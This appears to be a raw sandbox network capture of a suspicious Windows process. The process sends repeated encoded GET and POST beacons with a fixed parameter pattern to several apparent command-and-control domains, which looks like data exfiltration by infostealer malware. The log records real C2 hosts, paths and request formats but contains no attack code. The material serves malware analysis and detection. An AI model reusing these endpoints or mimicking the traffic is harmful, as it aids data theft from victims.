Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp: Nov 18, 2024 16:27:54.705920935 CET    Bytes transferred: 390    Direction: OUT
GET /9ezc/?92=DPyPNvf84fs0yXSp&bdlD=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+OZM84GvKl89TQvRVoJIWPcM5zWijXmHfAArwoQ1tIQ9QsTkOWIA= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.wukong.college
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Timestamp: Nov 18, 2024 16:27:55.661092997 CET    Bytes transferred: 390    Direction: IN
HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:27:55 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 65 7a 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>


Session ID: 37
Source IP: 192.168.2.6    Source Port: 50024
Destination IP: 23.106.59.18    Destination Port: 80
PID: 1468
Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp: Nov 18, 2024 16:28:00.999463081 CET    Bytes transferred: 664    Direction: OUT
POST /95c0/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Host: www.vehiculargustav.click
Origin: http://www.vehiculargustav.click
Referer: http://www.vehiculargustav.click/95c0/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Raw: 62 64 6c 44 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 4f 76 55 72 47 31 59 43 64 37 6a 38 53 50 2b 61 51 73 71 4b 54 6a 4d 4e 70 43 32 50 48 48 6e 6a 34 4a 55 45 68 7a 41 70 78 7a 52 4e 6e 38 30 76 59 79 31 34 4b 59 35 45 2f 64 6c 48 39 64 6c 72 35 55 62 42 41 46 33 34 59 66 64 2f 6d 57 34 45 30 59 61 50 65 61 67 33 30 4d 50 78 71 49 74 56 47 34 37 5a 4e 62 45 63 68 71 54 62 47 46 69 67 68 67 6c 6d 66 6f 6c 36 2f 4c 4f 44 6f 70 32 68 32 43 2b 6f 62 41 75 37 68 45 2b 66 45 78 4f 47 67 42 35 4c 6c 73 6a 64 49 66 2b 34 66 6e 31 43 30 66 59 44 72 32 32 68 56 78 41 72 6f 44 34 4f 68 64 4c 56 61 4b 51 4c 32 62 50 4d 6f 66 34 54
Data Ascii: bdlD=5oZRZJtRgbXMOvUrG1YCd7j8SP+aQsqKTjMNpC2PHHnj4JUEhzApxzRNn80vYy14KY5E/dlH9dlr5UbBAF34Yfd/mW4E0YaPeag30MPxqItVG47ZNbEchqTbGFighglmfol6/LODop2h2C+obAu7hE+fExOGgB5LlsjdIf+4fn1C0fYDr22hVxAroD4OhdLVaKQL2bPMof4T
Timestamp: Nov 18, 2024 16:28:01.817152977 CET    Bytes transferred: 423    Direction: IN
HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:27:59 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                38192.168.2.65002523.106.59.18801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:03.562640905 CET688OUTPOST /95c0/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.vehiculargustav.click
                                                                                                                                Origin: http://www.vehiculargustav.click
                                                                                                                                Referer: http://www.vehiculargustav.click/95c0/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=5oZRZJtRgbXMPPkrHUYCfbj/Of+aaMriTjINpDylH1Tj9dYEgyAp9TRNvc0mVS1zKY1i/YFH9dZr5RnBciD3ZPdxt24CpIaPeag30IfLqI1VGILZM6EbvKTYHFiglglifolE/J7Los6h2DOoaSK6uE+dAxPkkz0c/MTeRPWKFHlP4JFZ3F2CHhgpoBg8h9L/YKoLkMDrnrdwIUd6z9NL4LnRd0foN+8aZA==
Timestamp: Nov 18, 2024 16:28:04.352308989 CET | Bytes transferred: 423 | Direction: IN | Data:
HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:28:01 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


Session ID: 39 | Source IP: 192.168.2.6 | Source Port: 50026 | Destination IP: 23.106.59.188 | Destination Port: 80 | PID: 1468 | Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp: Nov 18, 2024 16:28:06.112718105 CET | Bytes transferred: 1701 | Direction: OUT | Data:
POST /95c0/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Cache-Control: max-age=0
Connection: close
Host: www.vehiculargustav.click
Origin: http://www.vehiculargustav.click
Referer: http://www.vehiculargustav.click/95c0/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Timestamp: Nov 18, 2024 16:28:06.896404982 CET | Bytes transferred: 423 | Direction: IN | Data:
HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:28:04 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


Session ID: 40 | Source IP: 192.168.2.6 | Source Port: 50027 | Destination IP: 23.106.59.188 | Destination Port: 80 | PID: 1468 | Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp: Nov 18, 2024 16:28:08.657624006 CET | Bytes transferred: 397 | Direction: OUT | Data:
GET /95c0/?bdlD=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4XocmoyAxgZDXS9ILoL/richVPo7jE4Ugu66IHT+Zvw5gPpB1yeo=&92=DPyPNvf84fs0yXSp HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.vehiculargustav.click
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Timestamp: Nov 18, 2024 16:28:09.497873068 CET | Bytes transferred: 423 | Direction: IN | Data:
HTTP/1.1 404 Not Found
Date: Mon, 18 Nov 2024 15:28:07 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


Session ID: 41 | Source IP: 192.168.2.6 | Source Port: 50028 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 1468 | Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp: Nov 18, 2024 16:28:23.337167025 CET | Bytes transferred: 646 | Direction: OUT | Data:
POST /fjsq/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Host: www.yushaliu.online
Origin: http://www.yushaliu.online
Referer: http://www.yushaliu.online/fjsq/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=LrxLbm2PdKLiwF+yrPXIX+wcnzx1XkbA5KTvhJFX9DIf6AVJ6rsnHX9DnJxlUgQFUKqArpfNlNtnzEcmrC+ZSGaIUqfaCDc4LLcXvUy9OB00BNu5m4gxAzUCaXEi/JFtyHIPjALEzEGqcQyBk43TkS9IH+i0lLfnns7tiXA09yDqrBmDx9ubihOgU5SOMnkOOPV0AdnvMmn7


Session ID: 42 | Source IP: 192.168.2.6 | Source Port: 50029 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 1468 | Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp: Nov 18, 2024 16:28:25.882528067 CET | Bytes transferred: 670 | Direction: OUT | Data:
POST /fjsq/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Cache-Control: max-age=0
Connection: close
Host: www.yushaliu.online
Origin: http://www.yushaliu.online
Referer: http://www.yushaliu.online/fjsq/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=LrxLbm2PdKLiiwuyoorIf+wdoTx1C0aJ5KfvhM8K9Qgf6glJo/AnEX9DspxkaAQeUKmyrs/NlJNnzEsmrSCeSWaKB6fYGDc4LLcXvU3qOCE0B9+5lZg2DzUDdXEiuZFpyHJcjBXizG+qcRiBktbQuS9OZOjrlZiAlfORtm1RmF/Bq37ZtOu4wxuiU7K8MHkkMPt0SKrIDSCYHk9+4a5EoHUGyFv09NZrKA==


Session ID: 43 | Source IP: 192.168.2.6 | Source Port: 50030 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 1468 | Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp: Nov 18, 2024 16:28:28.424783945 CET | Bytes transferred: 1683 | Direction: OUT | Data:
POST /fjsq/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Cache-Control: max-age=0
Connection: close
Host: www.yushaliu.online
Origin: http://www.yushaliu.online
Referer: http://www.yushaliu.online/fjsq/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36


Session ID: 44 | Source IP: 192.168.2.6 | Source Port: 50031 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 1468 | Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp: Nov 18, 2024 16:28:30.968291044 CET | Bytes transferred: 391 | Direction: OUT | Data:
GET /fjsq/?bdlD=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSYA+LY6DfFhY+Crt0zWizEXMfJfu41KYaKDIGSHYliJNf2GNGmHE=&92=DPyPNvf84fs0yXSp HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.yushaliu.online
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Timestamp: Nov 18, 2024 16:28:32.238030910 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 15:28:31 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_o3260Zj5vNPQHnH8AHnS41qfYKjE8t4pdI3aYxax/JueGXuur6HuGen+tT4KAPQ1mATUxDgcQFUziu0gErNYQw==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Connection: close
Data Ascii: a11c<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprApp
Timestamp: Nov 18, 2024 16:28:32.238092899 CET | Bytes transferred: 1236 | Direction: IN | Data:
Data Ascii: liesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery
Timestamp: Nov 18, 2024 16:28:32.238128901 CET | Bytes transferred: 1236 | Direction: IN | Data:
Data Ascii: ndow.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cm
                                                                                                                                Nov 18, 2024 16:28:32.238163948 CET1236INData Raw: 6e 63 74 69 6f 6e 20 78 28 69 2c 65 29 7b 76 61 72 20 77 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d
                                                                                                                                Data Ascii: nction x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1
                                                                                                                                Nov 18, 2024 16:28:32.238198996 CET548INData Raw: 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64
                                                                                                                                Data Ascii: currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length
                                                                                                                                Nov 18, 2024 16:28:32.238233089 CET1236INData Raw: 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6a 2e 73 72 63 3d 6b 2b 22 2f 2f 22 2b 68 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c 69 76 65 72 79 2f 22 2b 6d 2b 22 2f 63 6d 70 22 2b 62 2b 70 2b 22 2e 6a 73 22 3b 6a 2e
                                                                                                                                Data Ascii: .createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChil
                                                                                                                                Nov 18, 2024 16:28:32.238269091 CET146INData Raw: 62 2e 73 75 62 73 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29 7b 65
                                                                                                                                Data Ascii: b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=f
                                                                                                                                Nov 18, 2024 16:28:32.238298893 CET1236INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 3b 5f 5f 63 6d 70 2e 61 3d 5f 5f 63 6d 70 2e 61 7c 7c 5b 5d 3b 69 66 28 21 61 2e 6c 65 6e 67 74 68 29 7b 72 65 74 75 72 6e 20 5f 5f 63 6d 70 2e 61 7d 65 6c 73 65 7b 69 66
                                                                                                                                Data Ascii: unction(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1]===2){a[2]({gdprApplies:gdprAppliesGlobally,cmpLoaded:false,cmpStatus:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{
                                                                                                                                Nov 18, 2024 16:28:32.238336086 CET1236INData Raw: 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 76 61 72 20 68 3d 66 61 6c 73 65 3b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 5f 5f 67 70 70 2e 65 2e 6c 65 6e 67 74 68
                                                                                                                                Data Ascii: removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id==e){__gpp.e[d].splice(d,1);h=true;break}}return{eventName:"listenerRemoved",listenerId:e,data:h,pingData:window.cmp_gpp_ping()}}else{if(g=
                                                                                                                                Nov 18, 2024 16:28:32.238513947 CET1236INData Raw: 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29
                                                                                                                                Data Ascii: returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}if(typeof(c)==="object"&&c!==null&&"__gppCall" in c){var b=c.__gppCall;window.__gpp(b.command,function(h,g){var e={__gppReturn:{returnValue
                                                                                                                                Nov 18, 2024 16:28:32.238552094 CET1236INData Raw: 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 67 70 70 4c 6f 63 61 74 6f 72 22 29
                                                                                                                                Data Ascii: isablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_setStub("__tcfapi")}if(!("cmp_disableusp" in window)||!window.c


Session ID: 45
Source IP: 192.168.2.6
Source Port: 50033
Destination IP: 3.33.130.190
Destination Port: 80
PID: 1468
Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe

Timestamp: Nov 18, 2024 16:28:37.483262062 CET
Bytes transferred: 661
Direction: OUT
Data:
POST /ucmb/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Host: www.marketprediction.app
Origin: http://www.marketprediction.app
Referer: http://www.marketprediction.app/ucmb/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=in6yu/YF+9DT/tP4w6vkrWGTWEQP9Pz3LBuzFAjKsfduzJnPOO1rbuX2491reaGwmCxjrLtiaPeawHPEMPvy1Ti+Zv6Tv5mrl4NEpShtFXb8m0mP7tW1KFZ69cbD3mRJgf9EwYaRs4NXzQ42H6k9ZmMg3O5A+9+8SsGga2Ot8R7WtNhlvGOz96ajd0mcAPEHYhYC1jgr/pD7


Session ID: 46
Source IP: 192.168.2.6
Source Port: 50034
Destination IP: 3.33.130.190
Destination Port: 80
PID: 1468
Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe

Timestamp: Nov 18, 2024 16:28:40.034811020 CET
Bytes transferred: 685
Direction: OUT
Data:
POST /ucmb/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Cache-Control: max-age=0
Connection: close
Host: www.marketprediction.app
Origin: http://www.marketprediction.app
Referer: http://www.marketprediction.app/ucmb/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD=in6yu/YF+9DT5N/4jNTks2GQTEQPzvzsLBqzFBnass1u2cDPPP1reuX2zd1iU6GumC9BrKRiaO6awG/EM+vxzDiGRP6RxJmrl4NEpSk6FXD8mEWP6MW0M1Z9rMbDm2RNgf9ywd7Ms6FXzSw2Hrk+QmMm4u4cxO73etLcU1yJhzf2hb8/z1OQvq6hd2+uAvEtahgCn0sMwdmYoHNlFTvNp2aT6aAlefkgpA==


Session ID: 47
Source IP: 192.168.2.6
Source Port: 50035
Destination IP: 3.33.130.190
Destination Port: 80
PID: 1468
Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe

Timestamp: Nov 18, 2024 16:28:42.594012022 CET
Bytes transferred: 1698
Direction: OUT
Data:
POST /ucmb/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Cache-Control: max-age=0
Connection: close
Host: www.marketprediction.app
Origin: http://www.marketprediction.app
Referer: http://www.marketprediction.app/ucmb/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: bdlD= [TRUNCATED]


Session ID: 48
Source IP: 192.168.2.6
Source Port: 50036
Destination IP: 3.33.130.190
Destination Port: 80
PID: 1468
Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe

Timestamp: Nov 18, 2024 16:28:45.141664982 CET
Bytes transferred: 396
Direction: OUT
Data:
GET /ucmb/?92=DPyPNvf84fs0yXSp&bdlD=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLzkLvWq29n5ve7+0lsSpjEyv7qUGv0unsJnIf6ZDw73FDzrF564s= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.marketprediction.app
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36

Timestamp: Nov 18, 2024 16:28:45.781634092 CET
Bytes transferred: 416
Direction: IN
Data:
HTTP/1.1 200 OK
Server: openresty
Date: Mon, 18 Nov 2024 15:28:45 GMT
Content-Type: text/html
Content-Length: 276
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?92=DPyPNvf84fs0yXSp&bdlD=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLzkLvWq29n5ve7+0lsSpjEyv7qUGv0unsJnIf6ZDw73FDzrF564s="}</script></head></html>


Session ID: 49
Source IP: 192.168.2.6
Source Port: 50037
Destination IP: 3.33.130.190
Destination Port: 80
PID: 1468
Process: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe

Timestamp: Nov 18, 2024 16:29:02.023539066 CET
Bytes transferred: 397
Direction: OUT
Data:
